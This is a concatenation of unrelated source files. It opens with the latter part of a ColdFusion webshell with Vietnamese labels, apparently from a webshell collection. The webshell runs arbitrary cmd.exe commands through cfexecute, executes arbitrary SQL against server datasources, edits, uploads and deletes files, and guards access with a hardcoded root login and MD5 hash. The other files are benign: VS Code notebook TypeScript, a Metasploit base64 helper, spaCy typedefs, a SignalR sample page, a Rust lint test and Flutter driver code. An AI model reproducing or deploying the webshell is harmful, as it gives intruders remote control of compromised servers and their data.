0);"><u> <- Back</u></a> <cfelse> <a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a> </cfif> </cfoutput> <cfelseif action is "cmd"> <cfoutput> <cfif not isDefined("patch")> <cfif FileExists("#GetDirectoryFromPath(GetTemplatePath())#cdm.exe")> <cfset patch = "#GetDirectoryFromPath(GetTemplatePath())#cmd.exe"> <cfset out = "#GetDirectoryFromPath(GetTemplatePath())#out.txt"> <cfelseif FileExists("C:\windows\system32\cmd.exe")> <cfset patch = "C:\windows\system32\cmd.exe"> <cfset out = "C:\windows\system32\out.txt"> <cfelseif FileExists("C:\winnp\system32\cmd.exe")> <cfset patch = "C:\winnp\system32\cmd.exe"> <cfset out = "C:\winnp\system32\out.txt"> <cfelse> <p>Kh&##244;ng t&##236;m th&##7845;y t&##7879;p cmd.exe</p> <p>Khai b&##225;o bi&##7871;n patch l&##224; &##273;&##432;&##7901;ng d&##7851;n tr&##7921;c ti&##7871;p t&##7899;i t&##7879;p cmd.exe</p> <p>Khai b&##225;o bi&##7871;n out l&##224; &##273;&##432;&##7901;ng d&##7851;n tr&##7921;c ti&##7871;p t&##7899;i t&##7879;p d&##7919; li&##7879;u</p> <cfset sai = 1> </cfif> <cfelseif FileExists("#patch#")> <cfset out = "#GetDirectoryFromPath(patch)#out.txt"> <cfelse> <p>Kh&##244;ng t&##236;m th&##7845;y t&##7879;p cmd.exe</p> </cfif> <cfif not isDefined("sai")> <cfform name="articles" ENCTYPE="multipart/form-data"> Enter command: <cfinput type="text" name="command" size="25" value=""> <input type="submit" value="Run" /> </cfform> <cfif isDefined("command")> <p>Results:</p> <cfexecute name="#patch#" arguments="/C #command# > #out#" timeout="60"></cfexecute> #ReadFile('#out#')# #out# <cfif FileExists("#out#")> <cffile action="delete" file="#out#"> </cfif> </cfif> </cfif> <br> <a href="?action=goto&scr=#GetDirectoryFromPath(GetTemplatePath())#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a> </cfoutput> <cfelseif action is "datainfo"> <cfoutput> <cfdump var="#DataSoureceInfo#"> <a href="?action=goto&scr=#GetDirectoryFromPath(GetTemplatePath())#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a> </cfoutput> <cfelseif action is "save"> <cfoutput> <cfif isDefined("form.fileName")> <title>&##272;&##227; l&##432;u t&##7879;p</title> <cffile action="write" file="#scr#\#form.fileName#" output="#form.fileContent#" addnewline="no"> &##272;&##227; <cfif form.action_type IS "edit">s&##7917;a<cfelse>t&##7841;o</cfif> th&##224;nh c&##244;ng t&##7879;p <span style="font-weight:bold;">#form.fileName#</span>.<br> <a href="?action=goto&scr=#scr#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a> <cfelse> <a href="javascript:history.back(1);" style="color: rgb(255, 0, 0);"><u> <- Back</u></a> </cfif> </cfoutput> <cfelseif action is "sql"> <cfoutput> <cfform name="articles1" ENCTYPE="multipart/form-data"> DataBase Name: <cfif isDefined("database")> <cfinput type="text" name="database" size="25" value="#database#"><br> <cfelseif IsDefined("DS")> <cfinput type="text" name="database" size="25" value="#DS#"><br> <cfelse> <cfinput type="text" name="database" size="25" value=""><br> </cfif> SQL query: <cfinput type="text" query="SQL" name="query" size="130" value=""><br> <input type="submit" value="Th&##7921;c hi&##7879;n" /> </cfform> </cfoutput> <cfif isDefined("database") and isDefined("query")> <cfquery name="SQL" DataSource="#database#"> #preserveSingleQuotes(query)# </cfquery> <br> <table width="90%" border="1" align="center"> <tr><td align="center">M?u h?i: <font color="red"><cfoutput>#query#</cfoutput></font></td></tr> <tr><td align="center">K?t qu? tr? v?:</td></tr> <tr><td><cfdump var="#SQL#" format="text" label="Ket qua"></td></tr> </table> <br> </cfif> <cfoutput> <a href="?action=goto&scr=#scr#" style="color: rgb(255, 0, 0);"><u> <- Back</u></a> </cfoutput> </cfif> <cfelse> <cfset action = "goto"> </cfif> <cfif action is "goto" or action is "del" or action is "deld"> <cfoutput> <center><a href="javascript:doMenu('thongtin');" id=xthongtin>[-]</a>Server info:</center> <div id="thongtin"> <!--- Lay thong tin ip ---> <cfif #cgi.http_x_forwarded_for# eq ""> <cfset clientip="#cgi.remote_addr#"> <cfelse> <cfset clientip="#cgi.http_x_forwarded_for#"> </cfif> <!--- In thong tin server ---> <span>Server IP:</span> #CGI.HTTP_HOST#:#CGI.SERVER_PORT#</span> - <span>Client IP:</span> #clientip#<br> <span>Gateway Interface:</span> #CGI.GATEWAY_INTERFACE# - <span>Server Name:</span> #CGI.SERVER_NAME#:#CGI.SERVER_PORT#<br> <span>Server Protocol:</span> #CGI.SERVER_PROTOCOL# - <span>Server Software:</span> #CGI.SERVER_SOFTWARE#<br> <span>Appserver:</span> #server.coldfusion.appserver# - <span>Expiration:</span> #DateFormat(server.coldfusion.expiration, "d/m/yy")# #TimeFormat(server.coldfusion.expiration, "HH:mm:ss")#<br> <span>Product Name:</span> #server.coldfusion.productname# - <span>Product Level:</span> #server.coldfusion.productlevel# - <span>Product Version:</span> #server.coldfusion.productversion#<br> <span>Server OS Arch:</span> #server.os.arch# - <span>Server OS Name:</span> #server.os.name# - <span>Server OS Version:</span> #server.os.version#<br> </div> <hr> <!--- Thu tao Object <cftry> <cfobject type="com" class="scripting.filesystemobject" name="fso" action="connect"> <cfcatch type="any"> <cfobject type="com" class="scripting.filesystemobject" name="fso" action="create"> </cfcatch> </cftry> ---> <hr> <center><a href="javascript:doMenu('congcu');" id=xcongcu>[-]</a>Main:</center> <div id="congcu"> Path: #dir#<br> Operations: <a href="?action=new&scr=#dir#">NewFile</a> - <a href="?action=newd&scr=#dir#">NewDir</a> - <a href="?action=upload&scr=#dir#" title="T&##7843;i l&##234;n m&##7897;t t&##7879;p t&##7915; m&##225;y t&##237;nh c&##7911;a b&##7841;n">Upload file</a> - <a href="?" title="Tr&##7903; v&##7873; th&##432; m&##7909;c ch&##7913;a Shell">---</a><br> Actions: <a href="?action=cmd" title="Th&##7921;c thi l&##7879;nh Command Dos">CMD</a> - <a href="?action=sql&scr=#dir#" title="Th&##7921;c thi l&##7879;nh SQL query">SQL</a> - <a href="?action=datainfo" title="Th&##244;ng tin C&##417; S&##7903; D&##7919; Li&##7879;u">Datainfo CSDL</a> </div> <hr> <h1>File manager:</h1> <div id="thumuc"> </cfoutput> <cfdirectory directory="#dir#" name="myDirectory" sort="type ASC" > <div class=content> <table width=100% class=main cellspacing=0 cellpadding=1><tr><th width='13px'><input type=checkbox class=chkbx name=ch11'></th><th>Name</th><th>Size</th><th>Modify</th><th>Chmod</th><th>Mode</th><th>Actions</th></tr> <cfoutput> <cfif len(dir) gt 3> <tr> <cfset updir = #dir#> <cfset updir = #RemoveChars(updir, len(updir), 1)#> <cfloop condition = "Right(updir, 1) neq '\'"> <cfset updir = #RemoveChars(updir, len(updir), 1)#> </cfloop> <th class=chkbx><input type=checkbox width='13px' class=chkbx></th><td width="20%"><strong><a href="?action=goto&scr=#updir#">..</a></strong></td> </tr> </cfif> </cfoutput> <cfset x=1> <cfoutput query="myDirectory"> <cfif x EQ 2> <tr class=l2><th class=chkbx width='13px'><input type=checkbox class=chkbx></th> </cfif> <cfif x EQ 1> <tr class=l1><th class=chkbx width='13px'><input type=checkbox class=chkbx></th> </cfif> <cfif x EQ 1> <cfset x=2> <cfelse> <cfset x=1> </cfif> <td> <cfif #Type# is "Dir"> <a href="?action=goto&scr=#dir##Name#\"><b>[#Name#]</b></a> <cfelse> <a href="?action=edit&scr=#dir##Name#\">#Name#</a> </cfif> </td> <td> <cfif #type# is "Dir"> <Dir> <cfelseif #Size# LT 1024> #Size# B <cfelseif #Size# LT 1024*1024> #round(Size/1024)# KB <cfelseif #Size# LT 1024*1024*1024> #round(Size/1024/1024)# MB <cfelseif #Size# LT 1024*1024*1024*1024> #round(Size/1024/1024/1024)# GB <cfelseif #Size# LT 1024*1024*1024*1024*1024> #round(Size/1024/1024/1024/1024)# TB </cfif> </td> <td> #DateFormat(DateLastModified, "d/m/yy")# #TimeFormat(DateLastModified, "HH:mm:ss")# </td> <td>#Attributes#</td> <td>#Mode#</td> <td> <cfif #Type# is "File"> <a href="?action=edit&scr=#dir##Name#">Edit</a>|<a href="?action=cut&scr=#dir##Name#">Cut</a>|<a href="?action=copy&scr=#dir##Name#">Copy</a>|<a href="?action=rename&scr=#dir##Name#">Rename</a>|<a href="?action=down&scr=#dir##Name#">Download</a>|<a href="?action=del&scr=#dir##Name#" onCLick="return confirm('Delete #Name# ?')">Delete</a> <cfelse> <a href="?action=cutd&scr=#dir##Name#\">Cutdir</a>|<a href="?action=copyd&scr=#dir##Name#\">Copy</a>|<a href="?action=renamed&scr=#dir##Name#\">Rename</a>|<a href="?action=deld&scr=#dir##Name#\" onCLick="return confirm('Delete #Name# ?')">DeleteDir</a> </cfif> </td> </tr> </cfoutput> </table></div> </div> </cfif> <!--- End Main ---> <cfelseif Not IsDefined("cookie.username")> <cfform name="articles" ENCTYPE="multipart/form-data"> <center><table width="300" border="0"> <tr> <td width="50">Username:</td> <td width="50"><input type="text" name="username"></td> </tr> <tr> <td width="50">Password:</td> <td width="50"><input type="password" name="password"></td> </tr> <tr> <td width="50">Remember you?:</td> <td width="50"> <input type="checkbox" name="RememberMe" value="Yes" checked> <input type="submit" name="Process" value="Login"> </td> </tr> </table></center> </cfform> <cfif IsDefined("username")> <cfset member_username = "root"> <cfset member_password = "a619d974658f3e749b2d88b215baea46"> <cfif #username# neq #member_username#> <center>Wrong username!</center> <cfset structclear(cookie)> <cfelseif hash(form.password, "MD5") neq #member_password#> <center>Wrong password!</center> <cfset structclear(cookie)> <cfelse> <cfif IsDefined("RememberMe")> <cfset member_password1 = hash(form.password, "MD5")> <cfcookie name="username" value="#form.username#" expires="NEVER"> <cfcookie name="password" value="#member_password1#" expires="NEVER"> <cfelse> <cfset member_password1 = hash(form.password, "MD5")> <cfcookie name="username" value="#form.username#"> <cfcookie name="password" value="#member_password1#"> </cfif> <cflocation url="?" addtoken="No"> </cfif> </cfif> </cfif> <!--- End Login ---> <hr> </body> </html>
ColdFusion
3
laotun-s/webshell
other/ololo.cfm
[ "MIT" ]
/*--------------------------------------------------------------------------------------------- * Copyright (c) Microsoft Corporation. All rights reserved. * Licensed under the MIT License. See License.txt in the project root for license information. *--------------------------------------------------------------------------------------------*/ import * as DOM from 'vs/base/browser/dom'; import { StandardKeyboardEvent } from 'vs/base/browser/keyboardEvent'; import { SimpleIconLabel } from 'vs/base/browser/ui/iconLabel/simpleIconLabel'; import { WorkbenchActionExecutedClassification, WorkbenchActionExecutedEvent } from 'vs/base/common/actions'; import { toErrorMessage } from 'vs/base/common/errorMessage'; import { Emitter, Event } from 'vs/base/common/event'; import { stripIcons } from 'vs/base/common/iconLabels'; import { KeyCode } from 'vs/base/common/keyCodes'; import { Disposable, DisposableStore, dispose } from 'vs/base/common/lifecycle'; import { ElementSizeObserver } from 'vs/editor/browser/config/elementSizeObserver'; import { IDimension, isThemeColor } from 'vs/editor/common/editorCommon'; import { ICommandService } from 'vs/platform/commands/common/commands'; import { IInstantiationService } from 'vs/platform/instantiation/common/instantiation'; import { INotificationService } from 'vs/platform/notification/common/notification'; import { ITelemetryService } from 'vs/platform/telemetry/common/telemetry'; import { IThemeService, ThemeColor } from 'vs/platform/theme/common/themeService'; import { INotebookCellActionContext } from 'vs/workbench/contrib/notebook/browser/controller/coreActions'; import { CodeCellLayoutInfo, MarkdownCellLayoutInfo } from 'vs/workbench/contrib/notebook/browser/notebookBrowser'; import { CellStatusbarAlignment, INotebookCellStatusBarItem } from 'vs/workbench/contrib/notebook/common/notebookCommon'; const $ = DOM.$; export interface IClickTarget { type: ClickTargetType; event: MouseEvent; } export const enum ClickTargetType { Container = 0, ContributedTextItem = 1, ContributedCommandItem = 2 } export class CellEditorStatusBar extends Disposable { readonly statusBarContainer: HTMLElement; private readonly leftItemsContainer: HTMLElement; private readonly rightItemsContainer: HTMLElement; private readonly itemsDisposable: DisposableStore; private leftItems: CellStatusBarItem[] = []; private rightItems: CellStatusBarItem[] = []; private width: number = 0; private currentContext: INotebookCellActionContext | undefined; protected readonly _onDidClick: Emitter<IClickTarget> = this._register(new Emitter<IClickTarget>()); readonly onDidClick: Event<IClickTarget> = this._onDidClick.event; constructor( container: HTMLElement, @IInstantiationService private readonly _instantiationService: IInstantiationService, @IThemeService private readonly _themeService: IThemeService, ) { super(); this.statusBarContainer = DOM.append(container, $('.cell-statusbar-container')); this.statusBarContainer.tabIndex = -1; const leftItemsContainer = DOM.append(this.statusBarContainer, $('.cell-status-left')); const rightItemsContainer = DOM.append(this.statusBarContainer, $('.cell-status-right')); this.leftItemsContainer = DOM.append(leftItemsContainer, $('.cell-contributed-items.cell-contributed-items-left')); this.rightItemsContainer = DOM.append(rightItemsContainer, $('.cell-contributed-items.cell-contributed-items-right')); this.itemsDisposable = this._register(new DisposableStore()); this._register(this._themeService.onDidColorThemeChange(() => this.currentContext && this.update(this.currentContext))); this._register(DOM.addDisposableListener(this.statusBarContainer, DOM.EventType.CLICK, e => { if (e.target === leftItemsContainer || e.target === rightItemsContainer || e.target === this.statusBarContainer) { // hit on empty space this._onDidClick.fire({ type: ClickTargetType.Container, event: e }); } else { if ((e.target as HTMLElement).classList.contains('cell-status-item-has-command')) { this._onDidClick.fire({ type: ClickTargetType.ContributedCommandItem, event: e }); } else { // text this._onDidClick.fire({ type: ClickTargetType.ContributedTextItem, event: e }); } } })); } private layout(): void { if (!this.currentContext) { return; } // TODO@roblou maybe more props should be in common layoutInfo? const layoutInfo = this.currentContext.cell.layoutInfo as CodeCellLayoutInfo | MarkdownCellLayoutInfo; const width = layoutInfo.editorWidth; if (!width) { return; } this.width = width; this.statusBarContainer.style.width = `${width}px`; const maxItemWidth = this.getMaxItemWidth(); this.leftItems.forEach(item => item.maxWidth = maxItemWidth); this.rightItems.forEach(item => item.maxWidth = maxItemWidth); } private getMaxItemWidth() { return this.width / 2; } update(context: INotebookCellActionContext) { this.currentContext = context; this.itemsDisposable.clear(); if (!this.currentContext) { return; } this.itemsDisposable.add(this.currentContext.cell.onDidChangeLayout(() => this.layout())); this.itemsDisposable.add(this.currentContext.cell.onDidChangeCellStatusBarItems(() => this.updateRenderedItems())); this.itemsDisposable.add(this.currentContext.notebookEditor.onDidChangeActiveCell(() => this.updateActiveCell())); this.layout(); this.updateActiveCell(); this.updateRenderedItems(); } private updateActiveCell(): void { const isActiveCell = this.currentContext!.notebookEditor.getActiveCell() === this.currentContext?.cell; this.statusBarContainer.classList.toggle('is-active-cell', isActiveCell); } private updateRenderedItems(): void { const items = this.currentContext!.cell.getCellStatusBarItems(); items.sort((itemA, itemB) => { return (itemB.priority ?? 0) - (itemA.priority ?? 0); }); const maxItemWidth = this.getMaxItemWidth(); const newLeftItems = items.filter(item => item.alignment === CellStatusbarAlignment.Left); const newRightItems = items.filter(item => item.alignment === CellStatusbarAlignment.Right).reverse(); const updateItems = (renderedItems: CellStatusBarItem[], newItems: INotebookCellStatusBarItem[], container: HTMLElement) => { if (renderedItems.length > newItems.length) { const deleted = renderedItems.splice(newItems.length, renderedItems.length - newItems.length); for (let deletedItem of deleted) { container.removeChild(deletedItem.container); deletedItem.dispose(); } } newItems.forEach((newLeftItem, i) => { const existingItem = renderedItems[i]; if (existingItem) { existingItem.updateItem(newLeftItem, maxItemWidth); } else { const item = this._instantiationService.createInstance(CellStatusBarItem, this.currentContext!, newLeftItem, maxItemWidth); renderedItems.push(item); container.appendChild(item.container); } }); }; updateItems(this.leftItems, newLeftItems, this.leftItemsContainer); updateItems(this.rightItems, newRightItems, this.rightItemsContainer); } override dispose() { super.dispose(); dispose(this.leftItems); dispose(this.rightItems); } } class CellStatusBarItem extends Disposable { readonly container = $('.cell-status-item'); set maxWidth(v: number) { this.container.style.maxWidth = v + 'px'; } private _currentItem!: INotebookCellStatusBarItem; private _itemDisposables = this._register(new DisposableStore()); constructor( private readonly _context: INotebookCellActionContext, itemModel: INotebookCellStatusBarItem, maxWidth: number | undefined, @ITelemetryService private readonly _telemetryService: ITelemetryService, @ICommandService private readonly _commandService: ICommandService, @INotificationService private readonly _notificationService: INotificationService, @IThemeService private readonly _themeService: IThemeService, ) { super(); this.updateItem(itemModel, maxWidth); } updateItem(item: INotebookCellStatusBarItem, maxWidth: number | undefined) { this._itemDisposables.clear(); if (!this._currentItem || this._currentItem.text !== item.text) { new SimpleIconLabel(this.container).text = item.text.replace(/\n/g, ' '); } const resolveColor = (color: ThemeColor | string) => { return isThemeColor(color) ? (this._themeService.getColorTheme().getColor(color.id)?.toString() || '') : color; }; this.container.style.color = item.color ? resolveColor(item.color) : ''; this.container.style.backgroundColor = item.backgroundColor ? resolveColor(item.backgroundColor) : ''; this.container.style.opacity = item.opacity ? item.opacity : ''; this.container.classList.toggle('cell-status-item-show-when-active', !!item.onlyShowWhenActive); if (typeof maxWidth === 'number') { this.maxWidth = maxWidth; } let ariaLabel: string; let role: string | undefined; if (item.accessibilityInformation) { ariaLabel = item.accessibilityInformation.label; role = item.accessibilityInformation.role; } else { ariaLabel = item.text ? stripIcons(item.text).trim() : ''; } this.container.setAttribute('aria-label', ariaLabel); this.container.setAttribute('role', role || ''); this.container.title = item.tooltip ?? ''; this.container.classList.toggle('cell-status-item-has-command', !!item.command); if (item.command) { this.container.tabIndex = 0; this._itemDisposables.add(DOM.addDisposableListener(this.container, DOM.EventType.CLICK, _e => { this.executeCommand(); })); this._itemDisposables.add(DOM.addDisposableListener(this.container, DOM.EventType.KEY_DOWN, e => { const event = new StandardKeyboardEvent(e); if (event.equals(KeyCode.Space) || event.equals(KeyCode.Enter)) { this.executeCommand(); } })); } else { this.container.removeAttribute('tabIndex'); } this._currentItem = item; } private async executeCommand(): Promise<void> { const command = this._currentItem.command; if (!command) { return; } const id = typeof command === 'string' ? command : command.id; const args = typeof command === 'string' ? [] : command.arguments ?? []; args.unshift(this._context); this._telemetryService.publicLog2<WorkbenchActionExecutedEvent, WorkbenchActionExecutedClassification>('workbenchActionExecuted', { id, from: 'cell status bar' }); try { await this._commandService.executeCommand(id, ...args); } catch (error) { this._notificationService.error(toErrorMessage(error)); } } } declare const ResizeObserver: any; export interface IResizeObserver { startObserving: () => void; stopObserving: () => void; getWidth(): number; getHeight(): number; dispose(): void; } export class BrowserResizeObserver extends Disposable implements IResizeObserver { private readonly referenceDomElement: HTMLElement | null; private readonly observer: any; private width: number; private height: number; constructor(referenceDomElement: HTMLElement | null, dimension: IDimension | undefined, changeCallback: () => void) { super(); this.referenceDomElement = referenceDomElement; this.width = -1; this.height = -1; this.observer = new ResizeObserver((entries: any) => { for (const entry of entries) { if (entry.target === referenceDomElement && entry.contentRect) { if (this.width !== entry.contentRect.width || this.height !== entry.contentRect.height) { this.width = entry.contentRect.width; this.height = entry.contentRect.height; DOM.scheduleAtNextAnimationFrame(() => { changeCallback(); }); } } } }); } getWidth(): number { return this.width; } getHeight(): number { return this.height; } startObserving(): void { this.observer.observe(this.referenceDomElement!); } stopObserving(): void { this.observer.unobserve(this.referenceDomElement!); } override dispose(): void { this.observer.disconnect(); super.dispose(); } } export function getResizesObserver(referenceDomElement: HTMLElement | null, dimension: IDimension | undefined, changeCallback: () => void): IResizeObserver { if (ResizeObserver) { return new BrowserResizeObserver(referenceDomElement, dimension, changeCallback); } else { return new ElementSizeObserver(referenceDomElement, dimension, changeCallback); } }
TypeScript
5
Dlitosh/vscode
src/vs/workbench/contrib/notebook/browser/view/renderers/cellWidgets.ts
[ "MIT" ]
#include "pch.h" /** Takes data, allocate a buffer in heap of size 4/3 + 2 to handle the result, base64 encode it and returns a pointer to result buffer. @param const unsigned char* data The data to be encoded. @param unsigned short input_length Length of unencoded data (length of previous arg) @param unsigned short input_length An address to handle the length of b64 encoded result data. Will be 4/3 + 2 of input_length @return char* A pointer to the heap buffer containing the b64 encoded result */ char* base64_encode(const unsigned char* data, unsigned short input_length, unsigned short* output_length) { char* encoded_data = NULL; DWORD local_output_len = 0; if (!CryptBinaryToStringA ( data, input_length, CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, NULL, &local_output_len )) { return NULL; } encoded_data = (char*)calloc(local_output_len, sizeof(char)); if (!encoded_data) { return NULL; } if (!CryptBinaryToStringA ( data, input_length, CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, encoded_data, &local_output_len )) { return NULL; } if (local_output_len <= 65535) { *output_length = (unsigned short)local_output_len; } else return NULL; return encoded_data; } /** Builds a decoding table in heap. Then takes base 64 encoded data data, allocate a buffer in heap of size 3/4 of input length to handle the result, base64 decode it and returns a pointer to the result buffer. Then, free the base64 decoding table. @param const unsigned char* data The data to be decoded. @param unsigned short input_length Length of encoded data (length of previous arg) @param unsigned short input_length An address to handle the length of b64 encoded result data. Will be 3/4 of input_length @return char* A pointer to the heap buffer containing the decoded result */ unsigned char* base64_decode(const char* data, unsigned short input_length, unsigned short* output_length) { unsigned char* decoded_data = NULL; DWORD local_output_len = 0; if (!CryptStringToBinaryA ( data, 0, CRYPT_STRING_BASE64, NULL, &local_output_len, NULL, NULL )) { return NULL; } decoded_data = (unsigned char*)calloc(local_output_len, sizeof(char)); if (!decoded_data) { return NULL; } if (!CryptStringToBinaryA ( data, 0, CRYPT_STRING_BASE64, decoded_data, &local_output_len, NULL, NULL )) { return NULL; } if (local_output_len <= 65535) { *output_length = (unsigned short)local_output_len; } else return NULL; return decoded_data; }
C
5
OsmanDere/metasploit-framework
external/source/exploits/drunkpotato/Common_Src_Files/base64.c
[ "BSD-2-Clause", "BSD-3-Clause" ]
from libc.stdint cimport uint16_t, uint32_t, uint64_t, uintptr_t, int32_t from libc.stdint cimport uint8_t ctypedef float weight_t ctypedef uint64_t hash_t ctypedef uint64_t class_t ctypedef uint64_t attr_t ctypedef uint64_t flags_t ctypedef uint16_t len_t ctypedef uint16_t tag_t
Cython
3
snosrap/spaCy
spacy/typedefs.pxd
[ "MIT" ]
<%@ Page Title="ASP.NET SignalR: Hub Connection API Demo" Language="C#" MasterPageFile="~/SignalR.Master" AutoEventWireup="true" CodeBehind="Default.aspx.cs" Inherits="Microsoft.AspNet.SignalR.Samples.Hubs.HubConnectionAPI.Default" %> <asp:Content ID="Content1" ContentPlaceHolderID="MainContent" runat="server"> <ul class="breadcrumb"> <li><a href="<%: ResolveUrl("~/") %>">SignalR Samples</a> <span class="divider">/</span></li> <li class="active">Hub Connection API</li> </ul> <div class="page-header"> <h2>Hub Connection API</h2> <p>Demonstrates Hub Connection API including starting and stopping, sending and receiving messages, and managing groups.</p> </div> <p> <label for="group">Group: </label> <input type="text" id="group" placeholder="Group Name" /> <input type="button" id="joinGroup" class="btn" value="Join Group" /> <input type="button" id="leaveGroup" class="btn" value="Leave Group" /> </p> <p> <label for="connection">Specified ConnectionID: </label> <input type="text" id="connection" style="width: 460px" placeholder="connectionId" /> </p> <div> <h4>To Everybody</h4> <div> <input type="text" id="message" placeholder="Message" /> <input type="button" id="broadcast" class="btn" value="Broadcast" /> <input type="button" id="broadcastExceptSpecified" class="btn" value="Broadcast (All Except specified Connection)" /> <input type="button" id="other" class="btn" value="Other (Everyone but me)" /> </div> </div> <div> <h4>To Group</h4> <div> <input type="text" id="groupMessage" placeholder="Message" /> <input type="button" id="groupmsg" class="btn" value="Send to group" /> <input type="button" id="groupmsgExceptSpecified" class="btn" value="Send to group (Except specified Connection)" /> <input type="button" id="otherInGroupmsg" class="btn" value="Send to Other In Group" /> </div> </div> <div> <h4>To Me /specified</h4> <div> <input type="text" id="me" placeholder="Message" /> <input type="button" id="sendToMe" class="btn" value="Send to me" /> <input type="button" id="specified" class="btn" value="Send to specified connection" /> </div> </div> <button id="stopStart" class="btn btn-info btn-small" disabled="disabled"><i class="icon-stop icon-white"></i><span>Stop Connection</span></button> <h5>Messages</h5> <ul id="messages"> </ul> </asp:Content> <asp:Content ID="Content2" ContentPlaceHolderID="Scripts" runat="server"> <script src="<%: ResolveUrl("~/signalr/hubs") %>"></script> <script src="HubConnectionAPI.js"></script> </asp:Content>
ASP
3
jbruening/SignalR
samples/Microsoft.AspNet.SignalR.Samples/Hubs/HubConnectionAPI/Default.aspx
[ "Apache-2.0" ]
// check-pass #![feature(box_patterns)] #![warn(unused)] // UI tests pass `-A unused` (#43896) struct SoulHistory { corridors_of_light: usize, hours_are_suns: bool, endless_and_singing: bool } struct LovelyAmbition { lips: usize, fire: usize } #[derive(Clone, Copy)] enum Large { Suit { case: () } } struct Tuple(Large, ()); fn main() { let i_think_continually = 2; //~ WARNING unused variable: `i_think_continually` let who_from_the_womb_remembered = SoulHistory { corridors_of_light: 5, hours_are_suns: true, endless_and_singing: true }; let mut mut_unused_var = 1; //~^ WARNING unused variable: `mut_unused_var` //~| WARNING variable does not need to be mutable let (mut var, unused_var) = (1, 2); //~^ WARNING unused variable: `var` //~| WARNING unused variable: `unused_var` //~| WARNING variable does not need to be mutable // NOTE: `var` comes after `unused_var` lexicographically yet the warning // for `var` will be emitted before the one for `unused_var`. We use an // `IndexMap` to ensure this is the case instead of a `BTreeMap`. if let SoulHistory { corridors_of_light, //~ WARNING unused variable: `corridors_of_light` mut hours_are_suns, //~ WARNING `hours_are_suns` is assigned to, but endless_and_singing: true } = who_from_the_womb_remembered { hours_are_suns = false; //~ WARNING unused_assignments } let the_spirit = LovelyAmbition { lips: 1, fire: 2 }; let LovelyAmbition { lips, fire } = the_spirit; //~ WARNING unused variable: `fire` println!("{}", lips); let bag = Large::Suit { case: () }; // Plain struct match bag { Large::Suit { case } => {} //~ WARNING unused variable: `case` }; // Referenced struct match &bag { &Large::Suit { case } => {} //~ WARNING unused variable: `case` }; // Boxed struct match Box::new(bag) { box Large::Suit { case } => {} //~ WARNING unused variable: `case` }; // Tuple with struct match (bag,) { (Large::Suit { case },) => {} //~ WARNING unused variable: `case` }; // Slice with struct match [bag] { [Large::Suit { case }] => {} //~ WARNING unused variable: `case` }; // Tuple struct with struct match Tuple(bag, ()) { Tuple(Large::Suit { case }, ()) => {} //~ WARNING unused variable: `case` }; }
Rust
4
ohno418/rust
src/test/ui/lint/unused/issue-47390-unused-variable-in-struct-pattern.rs
[ "ECL-2.0", "Apache-2.0", "MIT-0", "MIT" ]
// Copyright 2014 The Flutter Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. import 'dart:async'; import 'package:flutter/cupertino.dart'; import 'package:flutter/foundation.dart'; import 'package:flutter/gestures.dart'; import 'package:flutter/material.dart'; import 'package:flutter/rendering.dart' show RendererBinding; import 'package:flutter/scheduler.dart'; import 'package:flutter/semantics.dart'; import 'package:flutter/services.dart'; import 'package:flutter/widgets.dart'; import 'package:flutter_test/flutter_test.dart'; import '../common/deserialization_factory.dart'; import '../common/error.dart'; import '../common/find.dart'; import '../common/handler_factory.dart'; import '../common/message.dart'; import '_extension_io.dart' if (dart.library.html) '_extension_web.dart'; const String _extensionMethodName = 'driver'; /// Signature for the handler passed to [enableFlutterDriverExtension]. /// /// Messages are described in string form and should return a [Future] which /// eventually completes to a string response. typedef DataHandler = Future<String> Function(String? message); class _DriverBinding extends BindingBase with SchedulerBinding, ServicesBinding, GestureBinding, PaintingBinding, SemanticsBinding, RendererBinding, WidgetsBinding, TestDefaultBinaryMessengerBinding { _DriverBinding(this._handler, this._silenceErrors, this._enableTextEntryEmulation, this.finders, this.commands); final DataHandler? _handler; final bool _silenceErrors; final bool _enableTextEntryEmulation; final List<FinderExtension>? finders; final List<CommandExtension>? commands; @override void initServiceExtensions() { super.initServiceExtensions(); final FlutterDriverExtension extension = FlutterDriverExtension(_handler, _silenceErrors, _enableTextEntryEmulation, finders: finders ?? const <FinderExtension>[], commands: commands ?? const <CommandExtension>[]); registerServiceExtension( name: _extensionMethodName, callback: extension.call, ); if (kIsWeb) { registerWebServiceExtension(extension.call); } } } /// Enables Flutter Driver VM service extension. /// /// This extension is required for tests that use `package:flutter_driver` to /// drive applications from a separate process. In order to allow the driver /// to interact with the application, this method changes the behavior of the /// framework in several ways - including keyboard interaction and text /// editing. Applications intended for release should never include this /// method. /// /// Call this function prior to running your application, e.g. before you call /// `runApp`. /// /// Optionally you can pass a [DataHandler] callback. It will be called if the /// test calls [FlutterDriver.requestData]. /// /// `silenceErrors` will prevent exceptions from being logged. This is useful /// for tests where exceptions are expected. Defaults to false. Any errors /// will still be returned in the `response` field of the result JSON along /// with an `isError` boolean. /// /// The `enableTextEntryEmulation` parameter controls whether the application interacts /// with the system's text entry methods or a mocked out version used by Flutter Driver. /// If it is set to false, [FlutterDriver.enterText] will fail, /// but testing the application with real keyboard input is possible. /// This value may be updated during a test by calling [FlutterDriver.setTextEntryEmulation]. /// /// The `finders` and `commands` parameters are optional and used to add custom /// finders or commands, as in the following example. /// /// ```dart main /// void main() { /// enableFlutterDriverExtension( /// finders: <FinderExtension>[ SomeFinderExtension() ], /// commands: <CommandExtension>[ SomeCommandExtension() ], /// ); /// /// app.main(); /// } /// ``` /// /// ```dart /// driver.sendCommand(SomeCommand(ByValueKey('Button'), 7)); /// ``` /// /// Note: SomeFinder and SomeFinderExtension must be placed in different files /// to avoid `dart:ui` import issue. Imports relative to `dart:ui` can't be /// accessed from host runner, where flutter runtime is not accessible. /// /// ```dart /// class SomeFinder extends SerializableFinder { /// const SomeFinder(this.title); /// /// final String title; /// /// @override /// String get finderType => 'SomeFinder'; /// /// @override /// Map<String, String> serialize() => super.serialize()..addAll(<String, String>{ /// 'title': title, /// }); /// } /// ``` /// /// ```dart /// class SomeFinderExtension extends FinderExtension { /// /// String get finderType => 'SomeFinder'; /// /// SerializableFinder deserialize(Map<String, String> params, DeserializeFinderFactory finderFactory) { /// return SomeFinder(json['title']); /// } /// /// Finder createFinder(SerializableFinder finder, CreateFinderFactory finderFactory) 